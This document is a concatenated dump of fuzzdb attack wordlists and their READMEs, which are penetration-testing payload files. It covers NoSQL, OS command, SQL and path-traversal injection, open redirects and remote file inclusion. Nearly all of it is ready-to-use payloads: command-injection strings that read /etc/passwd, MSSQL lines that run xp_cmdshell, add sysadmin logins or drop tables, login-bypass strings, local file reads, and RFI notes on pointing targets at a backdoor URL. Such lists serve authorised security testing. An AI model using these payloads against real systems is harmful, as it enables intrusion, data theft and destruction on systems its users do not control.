/var/log/access_log 20 | /var/log/access.log 21 | /var/www/logs/error_log 22 | /var/www/logs/error.log 23 | /usr/local/apache/logs/error_log 24 | /usr/local/apache/logs/error.log 25 | /var/log/apache/error_log 26 | /var/log/apache2/error_log 27 | /var/log/apache/error.log 28 | /var/log/apache2/error.log 29 | /var/log/error_log 30 | /var/log/error.log 31 | -------------------------------------------------------------------------------- /fuzzdb/attack/no-sql-injection/Readme.md: -------------------------------------------------------------------------------- 1 | NoSQL Hacking Docs 2 | ================== 3 | - https://www.owasp.org/index.php/Testing_for_NoSQL_injection 4 | - https://arxiv.org/pdf/1506.04082.pdf 5 | - https://pentesterlab.com/exercises/web_for_pentester_II/course 6 | - https://ckarande.gitbooks.io/owasp-nodegoat-tutorial/content/tutorial/a1_-_sql_and_nosql_injection.html 7 | - https://www.defcon.org/images/defcon-21/dc-21-presentations/Chow/DEFCON-21-Chow-Abusing-NoSQL-Databases.pdf 8 | - http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html 9 | 10 | NoSQL Hacking Tools 11 | =================== 12 | - http://nosqlmap.net/index.html 13 | 14 | Credits 15 | ======= 16 | Thanks to https://github.com/cr0hn/nosqlinjection_wordlists for starting this wordlist 17 | -------------------------------------------------------------------------------- /fuzzdb/attack/no-sql-injection/mongodb.txt: -------------------------------------------------------------------------------- 1 | true, $where: '1 == 1' 2 | , $where: '1 == 1' 3 | $where: '1 == 1' 4 | ', $where: '1 == 1' 5 | 1, $where: '1 == 1' 6 | { $ne: 1 } 7 | ', $or: [ {}, { 'a':'a 8 | ' } ], $comment:'successful MongoDB injection' 9 | db.injection.insert({success:1}); 10 | db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 11 | || 1==1 12 | ' && this.password.match(/.*/)//+%00 13 | ' && this.passwordzz.match(/.*/)//+%00 14 | 
'%20%26%26%20this.password.match(/.*/)//+%00 15 | '%20%26%26%20this.passwordzz.match(/.*/)//+%00 16 | {$gt: ''} 17 | [$ne]=1 18 | -------------------------------------------------------------------------------- /fuzzdb/attack/os-cmd-execution/Commands-OSX.txt: -------------------------------------------------------------------------------- 1 | alias 2 | alloc 3 | apropos 4 | awk 5 | basename 6 | bash 7 | bg 8 | bind 9 | bless 10 | break 11 | builtin 12 | bzip 13 | cal 14 | caller 15 | case 16 | cat 17 | cd 18 | chflags 19 | chgrp 20 | chmod 21 | chown 22 | chroot 23 | cksum 24 | clear 25 | cmp 26 | comm 27 | command 28 | complete 29 | continue 30 | cp 31 | cron 32 | crontab 33 | curl 34 | cut 35 | date 36 | dc 37 | dd 38 | declare 39 | defaults 40 | df 41 | diff 42 | diff3 43 | dig 44 | dirname 45 | dirs 46 | diskutil 47 | disown 48 | ditto 49 | dot_clean 50 | drutil 51 | dscacheutil 52 | dscl 53 | du 54 | echo 55 | ed 56 | enable 57 | env 58 | eval 59 | exec 60 | exit 61 | expand 62 | expect 63 | export 64 | expr 65 | false 66 | fc 67 | fdisk 68 | fg 69 | file 70 | find 71 | fmt 72 | fold 73 | for 74 | fsck 75 | fsaclctl 76 | fs_usage 77 | ftp 78 | GetFileInfo 79 | getopt 80 | getopts 81 | goto 82 | grep 83 | groups 84 | gzip 85 | hash 86 | head 87 | hdiutil 88 | history 89 | hostname 90 | id 91 | if 92 | info 93 | install 94 | jobs 95 | join 96 | kextfind 97 | kickstart 98 | kill 99 | l 100 | last 101 | launchctl 102 | ll 103 | less 104 | let 105 | lipo 106 | ln 107 | local 108 | locate 109 | logname 110 | login 111 | logout 112 | lpr 113 | lprm 114 | lpstat 115 | ls 116 | lsregister 117 | lsbom 118 | lsof 119 | man 120 | mdfind 121 | mdutil 122 | mkdir 123 | mkfifo 124 | more 125 | mount 126 | mv 127 | net 128 | netstat 129 | networksetup 130 | nice 131 | nohup 132 | ntfs.util 133 | onintr 134 | open 135 | opensnoop 136 | osacompile 137 | osascript 138 | passwd 139 | paste 140 | pbcopy 141 | pbpaste 142 | pico 143 | ping 144 | pkgutil 145 | plutil 146 | pmset 
147 | popd 148 | pr 149 | printenv 150 | printf 151 | ps 152 | pushd 153 | pwd 154 | quota 155 | rcp 156 | read 157 | readonly 158 | reboot 159 | return 160 | rev 161 | rm 162 | rmdir 163 | rpm 164 | rsync 165 | say 166 | screen 167 | screencapture 168 | sdiff 169 | security 170 | sed 171 | select 172 | set 173 | setfile 174 | shift 175 | shopt 176 | shutdown 177 | sips 178 | sleep 179 | softwareupdate 180 | sort 181 | source 182 | split 183 | stop 184 | su 185 | sudo 186 | sum 187 | suspend 188 | sw_vers 189 | system_profiler 190 | systemsetup 191 | tail 192 | tar 193 | tee 194 | test 195 | textutil 196 | time 197 | times 198 | top 199 | touch 200 | tr 201 | trap 202 | traceroute 203 | true 204 | tty 205 | type 206 | ufs.util 207 | ulimit 208 | umask 209 | umount 210 | unalias 211 | uname 212 | unexpand 213 | uniq 214 | units 215 | unset 216 | until 217 | users 218 | uuencode 219 | uudecode 220 | uuidgen 221 | uucp 222 | vi 223 | wait 224 | wc 225 | whatis 226 | where 227 | which 228 | while 229 | who 230 | whoami 231 | write 232 | xargs 233 | yes 234 | -------------------------------------------------------------------------------- /fuzzdb/attack/os-cmd-execution/Commands-Windows.txt: -------------------------------------------------------------------------------- 1 | a 2 | arp 3 | assoc 4 | at 5 | atmadm 6 | attrib 7 | bootcfg 8 | break 9 | cacls 10 | call 11 | change 12 | chcp 13 | chdir 14 | chkdsk 15 | chkntfs 16 | cipher 17 | cls 18 | cmd 19 | cmstp 20 | color 21 | comp 22 | compact 23 | convert 24 | copy 25 | cprofile 26 | cscript 27 | date 28 | defrag 29 | del 30 | dir 31 | diskcomp 32 | diskcopy 33 | diskpart 34 | doskey 35 | driverquery 36 | echo 37 | endlocal 38 | eventcreate 39 | eventquery 40 | eventtriggers 41 | evntcmd 42 | exit 43 | expand 44 | fc 45 | filter 46 | find 47 | findstr 48 | finger 49 | flattemp 50 | for 51 | format 52 | fsutil 53 | ftp 54 | ftype 55 | getmac 56 | goto 57 | gpresult 58 | gpupdate 59 | graftabl 60 | help 61 | helpctr 62 
| hostname 63 | if 64 | ipconfig 65 | ipseccmd 66 | ipxroute 67 | irftp 68 | label 69 | lodctr 70 | logman 71 | lpq 72 | lpr 73 | macfile 74 | mkdir 75 | mmc 76 | mode 77 | more 78 | mountvol 79 | move 80 | msiexec 81 | msinfo32 82 | nbtstat 83 | net 84 | netsh 85 | netstat 86 | nslookup 87 | ntbackup 88 | ntcmdprompt 89 | ntsd 90 | openfiles 91 | pagefileconfig 92 | path 93 | pathping 94 | pause 95 | pbadmin 96 | pentnt 97 | perfmon 98 | ping 99 | popd 100 | print 101 | prncnfg 102 | prndrvr 103 | prnjobs 104 | prnmngr 105 | prnport 106 | prnqctl 107 | prompt 108 | pushd 109 | query 110 | rasdial 111 | rcp 112 | recover 113 | reg 114 | regsvr32 115 | relog 116 | rem 117 | rename 118 | replace 119 | rexec 120 | rmdir 121 | route 122 | rsh 123 | rsm 124 | runas 125 | sc 126 | schtasks 127 | secedit 128 | set 129 | setlocal 130 | shift 131 | shutdown 132 | sort 133 | start 134 | subst 135 | systeminfo 136 | sfc 137 | taskkill 138 | tasklist 139 | tcmsetup 140 | telnet 141 | tftp 142 | time 143 | title 144 | tracerpt 145 | tracert 146 | tree 147 | type 148 | typeperf 149 | unlodctr 150 | ver 151 | verify 152 | vol 153 | vssadmin 154 | w32tm 155 | winnt 156 | winnt32 157 | wmic 158 | xcopy 159 | -------------------------------------------------------------------------------- /fuzzdb/attack/os-cmd-execution/OSCommandInject.Windows.txt: -------------------------------------------------------------------------------- 1 | +|+Dir+c:\ 2 | $+|+Dir+c:\ 3 | %26%26+|+dir c:\ 4 | $%26%26dir c:\ 5 | %0a+dir+c:\ 6 | +|+Dir+c:%255c 7 | $+|+Dir+c:%255c 8 | %26%26+|+dir c:%255c 9 | $%26%26dir+c:%255c 10 | %0a+dir+c:%255c 11 | +|+Dir+c:%2f 12 | $+|+Dir+c:%2f 13 | %26%26+|+dir c:%2f 14 | $%26%26dir+c:%2f 15 | %0a+dir+c:%2f 16 | +dir+c:\+| 17 | +|+dir+c:\+| 18 | +|+dir+c:%2f+| 19 | dir+c:\ 20 | ||+dir|c:\ 21 | -------------------------------------------------------------------------------- /fuzzdb/attack/os-cmd-execution/command-execution-unix.txt: 
-------------------------------------------------------------------------------- 1 | 2 | 3 | /index.html|id| 4 | ;id; 5 | ;id 6 | ;netstat -a; 7 | ;id; 8 | |id 9 | |/usr/bin/id 10 | |id| 11 | |/usr/bin/id| 12 | ||/usr/bin/id| 13 | |id; 14 | ||/usr/bin/id; 15 | ;id| 16 | ;|/usr/bin/id| 17 | \n/bin/ls -al\n 18 | \n/usr/bin/id\n 19 | \nid\n 20 | \n/usr/bin/id; 21 | \nid; 22 | \n/usr/bin/id| 23 | \nid| 24 | ;/usr/bin/id\n 25 | ;id\n 26 | |usr/bin/id\n 27 | |nid\n 28 | `id` 29 | `/usr/bin/id` 30 | a);id 31 | a;id 32 | a);id; 33 | a;id; 34 | a);id| 35 | a;id| 36 | a)|id 37 | a|id 38 | a)|id; 39 | a|id 40 | |/bin/ls -al 41 | a);/usr/bin/id 42 | a;/usr/bin/id 43 | a);/usr/bin/id; 44 | a;/usr/bin/id; 45 | a);/usr/bin/id| 46 | a;/usr/bin/id| 47 | a)|/usr/bin/id 48 | a|/usr/bin/id 49 | a)|/usr/bin/id; 50 | a|/usr/bin/id 51 | ;system('cat%20/etc/passwd') 52 | ;system('id') 53 | ;system('/usr/bin/id') 54 | %0Acat%20/etc/passwd 55 | %0A/usr/bin/id 56 | %0Aid 57 | %0A/usr/bin/id%0A 58 | %0Aid%0A 59 | & ping -i 30 127.0.0.1 & 60 | & ping -n 30 127.0.0.1 & 61 | %0a ping -i 30 127.0.0.1 %0a 62 | `ping 127.0.0.1` 63 | | id 64 | & id 65 | ; id 66 | %0a id %0a 67 | `id` 68 | $;/usr/bin/id 69 | -------------------------------------------------------------------------------- /fuzzdb/attack/os-cmd-execution/command-injection-template.txt: -------------------------------------------------------------------------------- 1 | {cmd} 2 | ;{cmd} 3 | ;{cmd}; 4 | ^{cmd} 5 | |{cmd} 6 | <{cmd} 7 | <{cmd}; 8 | <{cmd}\n 9 | <{cmd}%0D 10 | <{cmd}%0A 11 | &{cmd} 12 | &{cmd}& 13 | &&{cmd} 14 | &&{cmd}&& 15 | %0D{cmd} 16 | %0D{cmd}%0D 17 | %0A{cmd} 18 | %0A{cmd}%0A 19 | \n{cmd} 20 | \n{cmd}\n 21 | '{cmd}' 22 | `{cmd}` 23 | ;{cmd}| 24 | ;{cmd}/n 25 | |{cmd}; 26 | a);{cmd} 27 | a;{cmd} 28 | a);{cmd} 29 | a;{cmd}; 30 | a);{cmd}| 31 | FAIL||{cmd} 32 | CMD=$'{cmd}';$CMD 33 | ;CMD=$'{cmd}';$CMD 34 | ^CMD=$'{cmd}';$CMD 35 | |CMD=$'{cmd}';$CMD 36 | &CMD=$'{cmd}';$CMD 37 | &&CMD=$'{cmd}';$CMD 38 | 
%0DCMD=$'{cmd}';$CMD 39 | FAIL||CMD=$'{cmd}';$CMD 40 | CMD=$\'{cmd}\';$CMD 41 | ;CMD=$\'{cmd}\';$CMD 42 | ^CMD=$\'{cmd}\';$CMD 43 | |CMD=$\'{cmd}\';$CMD 44 | &CMD=$\'{cmd}\';$CMD 45 | &&CMD=$\'{cmd}\';$CMD 46 | %0DCMD=$\'{cmd}\';$CMD 47 | FAIL||CMD=$\'{cmd}\';$CMD 48 | CMD=$"{cmd}";$CMD 49 | ;CMD=$"{cmd}";$CMD 50 | ^CMD=$"{cmd}";$CMD 51 | |CMD=$"{cmd}";$CMD 52 | &CMD=$"{cmd}";$CMD 53 | &&CMD=$"{cmd}";$CMD 54 | %0DCMD=$"{cmd}";$CMD 55 | FAIL||CMD=$"{cmd}";$CMD 56 | 57 | ;system('{cmd}') 58 | -------------------------------------------------------------------------------- /fuzzdb/attack/os-cmd-execution/shell-delimiters.txt: -------------------------------------------------------------------------------- 1 | ; 2 | ^ 3 | & 4 | && 5 | | 6 | || 7 | %0D 8 | %0A 9 | \n 10 | < 11 | -------------------------------------------------------------------------------- /fuzzdb/attack/os-cmd-execution/shell-operators.txt: -------------------------------------------------------------------------------- 1 | < 2 | > 3 | << 4 | >> 5 | <> 6 | >| 7 | | 8 | || 9 | & 10 | && 11 | $ 12 | ; 13 | &> 14 | &>> 15 | <<< 16 | >>> 17 | -------------------------------------------------------------------------------- /fuzzdb/attack/os-cmd-execution/source-disc-cmd-exec-traversal.txt: -------------------------------------------------------------------------------- 1 | ..%255c 2 | .%5c../..%5c 3 | /..%c0%9v../ 4 | /..%c0%af../ 5 | /..%255c..%255c 6 | 7 | -------------------------------------------------------------------------------- /fuzzdb/attack/os-cmd-execution/useful-commands-unix.txt: -------------------------------------------------------------------------------- 1 | uname -n -s 2 | whoami 3 | pwd 4 | last 5 | cat /etc/passwd 6 | ls -la /tmp 7 | ls -la /home 8 | ping -i 30 127.0.0.1 9 | ping 127.0.0.1 10 | ping -n 30 11 | -------------------------------------------------------------------------------- /fuzzdb/attack/os-cmd-execution/useful-commands-windows.txt: 
-------------------------------------------------------------------------------- 1 | ver 2 | chdir 3 | echo %USERNAME% 4 | -------------------------------------------------------------------------------- /fuzzdb/attack/os-dir-indexing/directory-indexing.txt: -------------------------------------------------------------------------------- 1 | ;dir 2 | `dir` 3 | |dir| 4 | |dir 5 | /%3f.jsp 6 | ?M=D 7 | //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 8 | -------------------------------------------------------------------------------- /fuzzdb/attack/path-traversal/README.md: -------------------------------------------------------------------------------- 1 | 2 | **traversals-8-deep-exotic-encoding.fuzz.txt** 3 | 4 | Use Regex to replace {FILE} with your target filename 5 | 6 | -------------------------------------------------------------------------------- /fuzzdb/attack/path-traversal/path-traversal-windows.txt: -------------------------------------------------------------------------------- 1 | C:/inetpub/wwwroot/global.asa 2 | C:\inetpub\wwwroot\global.asa 3 | C:/boot.ini 4 | C:\boot.ini 5 | D:\inetpub\wwwroot\global.asa 6 | D:/inetpub/wwwroot/global.asa 7 | -------------------------------------------------------------------------------- /fuzzdb/attack/redirect/README.md: -------------------------------------------------------------------------------- 1 | * redirect-injection-template.txt 2 | * Patterns for injecting into a value for attempting to bypass many input validation filters that intended to only allow only relative links on the same origin.
3 | * redirect-urls-template.txt 4 | * URL patterns that commonly lead to open redirects.
5 | 6 | Usage:
7 | Replace {target} in the files with an IP address or a hostname and path. Examples:
8 | * evil.com
9 | * evil.com/badurl
10 | * 1.2.3.4
11 | * 134744072
12 | 13 | Testing techniques:
14 | Filter Bypass 15 | * If periods are being stripped by the filter so that evil.com becomes evilcom, try converting the ip address to decimal notation form. 16 | http://www.geektools.com/geektools-cgi/ipconv.cgi 17 | * Try URL-encoding the replacement value for {target} 18 | Other Issues 19 | * If redirect.injection.template.txt usage results in the server proxying a request to the injected URL and returning its contents instead of redirecting to it, explore how this could be used to explore the servers localhost ports for web services, protected systems in a DMZ, interact through GET requests/REST interfaces, etc. 20 | 21 | TODO 22 | -------------------------------------------------------------------------------- /fuzzdb/attack/redirect/redirect-injection-template.txt: -------------------------------------------------------------------------------- 1 | {target} 2 | /{target} 3 | //{target} 4 | ///{target} 5 | ////{target} 6 | /\{target} 7 | %2f{target} 8 | %2f$2f{target} 9 | %2f{target}%2f%2f 10 | $2f%2f{target}%2f%2f 11 | %2f{target}// 12 | -------------------------------------------------------------------------------- /fuzzdb/attack/redirect/redirect-urls-template.txt: -------------------------------------------------------------------------------- 1 | ?url=http://{target} 2 | ?url=https://{target} 3 | ?next=http://{target} 4 | ?next=https://{target} 5 | ?url=http://{target} 6 | ?url=https://{target} 7 | ?url=http://{target} 8 | ?url=//{target} 9 | ?url=$2f%2f{target} 10 | ?next=//{target} 11 | ?next=$2f%2f{target} 12 | ?url=//{target} 13 | ?url=$2f%2f{target} 14 | ?url=//{target} 15 | /redirect/{target} 16 | /cgi-bin/redirect.cgi?{target} 17 | /out/{target} 18 | /out?{target} 19 | /out?/{target} 20 | /out?//{target} 21 | /out?/\{target} 22 | /out?///{target} 23 | ?view={target} 24 | ?view=/{target} 25 | ?view=//{target} 26 | ?view=/\{target} 27 | ?view=///{target} 28 | /login?to={target} 29 | /login?to=/{target} 30 | /login?to=//{target} 31 | 
/login?to=/\{target} 32 | /login?to=///{target} 33 | -------------------------------------------------------------------------------- /fuzzdb/attack/rfi/README.md: -------------------------------------------------------------------------------- 1 | rfi.fuzz.txt 2 | 3 | Remote File Include scanning 4 | 5 | Compiled by RSnake 02/01/2010 6 | 7 | Mostly from milw0rm osvdb.org and elsewhere 8 | 9 | Change XXpathXX to the path of your backdoor. 10 | Note that you may need to try it against every directory on the target and because of how this was culled you may need to add a question mark to your own XXpathXX URL: 11 | 12 | XXpathXX => http://www.example.com/hax.txt? 13 | 14 | see fuzzdb docs: 15 | 16 | /docs/attack-docs/rfi-cheatsheet.html 17 | 18 | Other tools: 19 | 20 | fimap http://code.google.com/p/fimap/ 21 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/detect/GenericBlind.txt: -------------------------------------------------------------------------------- 1 | sleep(__TIME__)# 2 | 1 or sleep(__TIME__)# 3 | " or sleep(__TIME__)# 4 | ' or sleep(__TIME__)# 5 | " or sleep(__TIME__)=" 6 | ' or sleep(__TIME__)=' 7 | 1) or sleep(__TIME__)# 8 | ") or sleep(__TIME__)=" 9 | ') or sleep(__TIME__)=' 10 | 1)) or sleep(__TIME__)# 11 | ")) or sleep(__TIME__)=" 12 | ')) or sleep(__TIME__)=' 13 | ;waitfor delay '0:0:__TIME__'-- 14 | );waitfor delay '0:0:__TIME__'-- 15 | ';waitfor delay '0:0:__TIME__'-- 16 | ";waitfor delay '0:0:__TIME__'-- 17 | ');waitfor delay '0:0:__TIME__'-- 18 | ");waitfor delay '0:0:__TIME__'-- 19 | ));waitfor delay '0:0:__TIME__'-- 20 | '));waitfor delay '0:0:__TIME__'-- 21 | "));waitfor delay '0:0:__TIME__'-- 22 | benchmark(10000000,MD5(1))# 23 | 1 or benchmark(10000000,MD5(1))# 24 | " or benchmark(10000000,MD5(1))# 25 | ' or benchmark(10000000,MD5(1))# 26 | 1) or benchmark(10000000,MD5(1))# 27 | ") or benchmark(10000000,MD5(1))# 28 | ') or benchmark(10000000,MD5(1))# 29 | 1)) or 
benchmark(10000000,MD5(1))# 30 | ")) or benchmark(10000000,MD5(1))# 31 | ')) or benchmark(10000000,MD5(1))# 32 | pg_sleep(__TIME__)-- 33 | 1 or pg_sleep(__TIME__)-- 34 | " or pg_sleep(__TIME__)-- 35 | ' or pg_sleep(__TIME__)-- 36 | 1) or pg_sleep(__TIME__)-- 37 | ") or pg_sleep(__TIME__)-- 38 | ') or pg_sleep(__TIME__)-- 39 | 1)) or pg_sleep(__TIME__)-- 40 | ")) or pg_sleep(__TIME__)-- 41 | ')) or pg_sleep(__TIME__)-- 42 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/detect/Generic_SQLI.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/detect/MSSQL.txt: -------------------------------------------------------------------------------- 1 | '; exec master..xp_cmdshell 'ping 10.10.1.2'-- 2 | 'create user name identified by 'pass123' -- 3 | 'create user name identified by pass123 temporary tablespace temp default tablespace users; 4 | ' ; drop table temp -- 5 | 'exec sp_addlogin 'name' , 'password' -- 6 | ' exec sp_addsrvrolemember 'name' , 'sysadmin' -- 7 | ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- 8 | ' grant connect to name; grant resource to name; -- 9 | ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) 10 | ' or 1=1 -- 11 | ' union (select @@version) -- 12 | ' union (select NULL, (select @@version)) -- 13 | ' union (select NULL, NULL, (select @@version)) -- 14 | ' union (select NULL, NULL, NULL, (select @@version)) -- 15 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- 16 | ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- 17 | -------------------------------------------------------------------------------- 
/fuzzdb/attack/sql-injection/detect/MSSQL_blind.txt: -------------------------------------------------------------------------------- 1 | '; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' -- 2 | '; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' -- 3 | '; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' -- 4 | '; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' -- 5 | '; if not(select system_user) <> 'sa' waitfor delay '0:0:2' -- 6 | '; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 7 | '; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' -- 8 | '; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' -- 9 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/detect/MySQL.txt: -------------------------------------------------------------------------------- 1 | 1'1 2 | 1 exec sp_ (or exec xp_) 3 | 1 and 1=1 4 | 1' and 1=(select count(*) from tablenames); -- 5 | 1 or 1=1 6 | 1' or '1'='1 7 | 1or1=1 8 | 1'or'1'='1 9 | fake@ema'or'il.nl'='il.nl 10 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/detect/MySQL_MSSQL.txt: -------------------------------------------------------------------------------- 1 | 1 2 | 1 and user_name() = 'dbo' 3 | \'; desc users; -- 4 | 1\'1 5 | 1' and non_existant_table = '1 6 | ' or username is not NULL or username = ' 7 | 1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116 8 | 1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' -- 9 | 1 uni/**/on select all from where 10 | 11 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/detect/README.md: -------------------------------------------------------------------------------- 1 | 2 | 
**MSSQL.fuzz.txt** 3 | 4 | you will need to customize/modify some of the values in the payload queries for best effect 5 | 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/exploit/README.md: -------------------------------------------------------------------------------- 1 | 2 | various useful post-exploitation commands 3 | 4 | **ms-sql-enumeration.fuzz.txt** 5 | * ms-sqli info disclosure payload fuzzfile 6 | * replace regex with your fuzzer for best results 7 | * run wireshark or tcpdump, look for incoming smb or icmp packets from victim 8 | * might need to terminate payloads with ;-- 9 | 10 | 11 | **mysql-injection-login-bypass.fuzz.txt** 12 | * regex replace as many as you can with your fuzzer for best results: 13 | * 14 | * also try to brute force a list of possible usernames, including possile admin acct names 15 | 16 | **mysql-read-local-files.fuzz.txt** 17 | * mysql local file disclosure through sqli 18 | * fuzz interesting absolute filepath/filename into 19 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/exploit/db2-enumeration.txt: -------------------------------------------------------------------------------- 1 | select versionnumber, version_timestamp from sysibm.sysversions; 2 | select user from sysibm.sysdummy1; 3 | select session_user from sysibm.sysdummy1; 4 | select system_user from sysibm.sysdummy1; 5 | select current server from sysibm.sysdummy1; 6 | select name from sysibm.systables; 7 | select grantee from syscat.dbauth; 8 | select * from syscat.tabauth; 9 | select * from syscat.dbauth where grantee = current user; 10 | select * from syscat.tabauth where grantee = current user; 11 | select name, tbname, coltype from sysibm.syscolumns; 12 | SELECT schemaname FROM syscat.schemata; 13 | -------------------------------------------------------------------------------- 
/fuzzdb/attack/sql-injection/exploit/ms-sql-enumeration.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/attack/sql-injection/exploit/ms-sql-enumeration.txt -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/exploit/mysql-injection-login-bypass.txt: -------------------------------------------------------------------------------- 1 | ' OR 1=1-- 2 | 'OR '' = ' Allows authentication without a valid username. 3 | '-- 4 | ' union select 1, '', '' 1-- 5 | 'OR 1=1-- 6 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/exploit/mysql-read-local-files.txt: -------------------------------------------------------------------------------- 1 | create table myfile (input TEXT); load data infile '' into table myfile; select * from myfile; 2 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/exploit/postgres-enumeration.txt: -------------------------------------------------------------------------------- 1 | select version(); 2 | select current_database(); 3 | select current_user; 4 | select session_user; 5 | select current_setting('log_connections'); 6 | select current_setting('log_statement'); 7 | select current_setting('port'); 8 | select current_setting('password_encryption'); 9 | select current_setting('krb_server_keyfile'); 10 | select current_setting('virtual_host'); 11 | select current_setting('port'); 12 | select current_setting('config_file'); 13 | select current_setting('hba_file'); 14 | select current_setting('data_directory'); 15 | select * from pg_shadow; 16 | select * from pg_group; 17 | create table myfile (input TEXT); 18 | copy myfile from '/etc/passwd'; 19 | select * from myfile;copy myfile to /tmp/test; 20 | 
-------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/payloads-sql-blind/README.md: -------------------------------------------------------------------------------- 1 | credits: http://funoverip.net/2010/12/blind-sql-injection-detection-with-burp-suite/ 2 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MSSQL-WHERE.txt: -------------------------------------------------------------------------------- 1 | waitfor delay '0:0:20' /* 2 | waitfor delay '0:0:20' -- 3 | ' waitfor delay '0:0:20' /* 4 | ' waitfor delay '0:0:20' -- 5 | " waitfor delay '0:0:20' /* 6 | " waitfor delay '0:0:20' -- 7 | ) waitfor delay '0:0:20' /* 8 | ) waitfor delay '0:0:20' -- 9 | )) waitfor delay '0:0:20' /* 10 | )) waitfor delay '0:0:20' -- 11 | ))) waitfor delay '0:0:20' /* 12 | ))) waitfor delay '0:0:20' -- 13 | )))) waitfor delay '0:0:20' /* 14 | )))) waitfor delay '0:0:20' -- 15 | ))))) waitfor delay '0:0:20' -- 16 | )))))) waitfor delay '0:0:20' -- 17 | ') waitfor delay '0:0:20' /* 18 | ') waitfor delay '0:0:20' -- 19 | ") waitfor delay '0:0:20' /* 20 | ") waitfor delay '0:0:20' -- 21 | ')) waitfor delay '0:0:20' /* 22 | ')) waitfor delay '0:0:20' -- 23 | ")) waitfor delay '0:0:20' /* 24 | ")) waitfor delay '0:0:20' -- 25 | '))) waitfor delay '0:0:20' /* 26 | '))) waitfor delay '0:0:20' -- 27 | "))) waitfor delay '0:0:20' /* 28 | "))) waitfor delay '0:0:20' -- 29 | ')))) waitfor delay '0:0:20' /* 30 | ')))) waitfor delay '0:0:20' -- 31 | ")))) waitfor delay '0:0:20' /* 32 | ")))) waitfor delay '0:0:20' -- 33 | '))))) waitfor delay '0:0:20' /* 34 | '))))) waitfor delay '0:0:20' -- 35 | "))))) waitfor delay '0:0:20' /* 36 | "))))) waitfor delay '0:0:20' -- 37 | ')))))) waitfor delay '0:0:20' /* 38 | ')))))) waitfor delay '0:0:20' -- 39 | ")))))) waitfor delay '0:0:20' /* 40 | ")))))) waitfor delay '0:0:20' -- 
-------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MySQL-ORDER_BY.txt: -------------------------------------------------------------------------------- 1 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 2 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 3 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 4 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 5 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 6 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 7 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 8 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 9 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 10 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 11 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 12 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 13 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 14 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 15 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 16 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 17 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 18 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 19 | -------------------------------------------------------------------------------- 
